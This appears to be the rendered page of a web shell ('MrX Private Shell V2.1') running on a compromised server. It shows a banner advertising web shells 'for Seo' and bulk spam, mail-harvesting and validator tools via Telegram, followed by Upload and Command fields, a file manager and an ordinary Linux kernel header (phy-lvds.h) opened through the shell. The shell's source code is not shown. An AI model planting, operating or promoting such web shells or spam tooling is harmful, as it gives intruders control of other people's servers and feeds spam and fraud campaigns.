__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
/* SPDX-License-Identifier: GPL-2.0 */
/*
 * Copyright 2020,2022 NXP
 */

#ifndef __PHY_LVDS_H_
#define __PHY_LVDS_H_

/**
 * struct phy_configure_opts_lvds - LVDS configuration set
 * @bits_per_lane_and_dclk_cycle:	Number of bits per lane per differential
 *					clock cycle.
 * @differential_clk_rate:		Clock rate, in Hertz, of the LVDS
 *					differential clock.
 * @lanes:				Number of active, consecutive,
 *					data lanes, starting from lane 0,
 *					used for the transmissions.
 * @is_slave:				Boolean, true if the phy is a slave
 *					which works together with a master
 *					phy to support dual link transmission,
 *					otherwise a regular phy or a master phy.
 *
 * This structure is used to represent the configuration state of a LVDS phy.
 */
struct phy_configure_opts_lvds {
	unsigned int	bits_per_lane_and_dclk_cycle;
	unsigned long	differential_clk_rate;
	unsigned int	lanes;
	bool		is_slave;
};

#endif /* __PHY_LVDS_H_ */

Filemanager

Name Type Size Permission Actions
tegra Folder 0755
omap_control_phy.h File 2.4 KB 0644
omap_usb.h File 679 B 0644
pcie.h File 243 B 0644
phy-dp.h File 1.85 KB 0644
phy-lvds.h File 945 B 0644
phy-mipi-dphy.h File 6.39 KB 0644
phy-sun4i-usb.h File 430 B 0644
phy.h File 14.09 KB 0644
ulpi_phy.h File 783 B 0644
Filemanager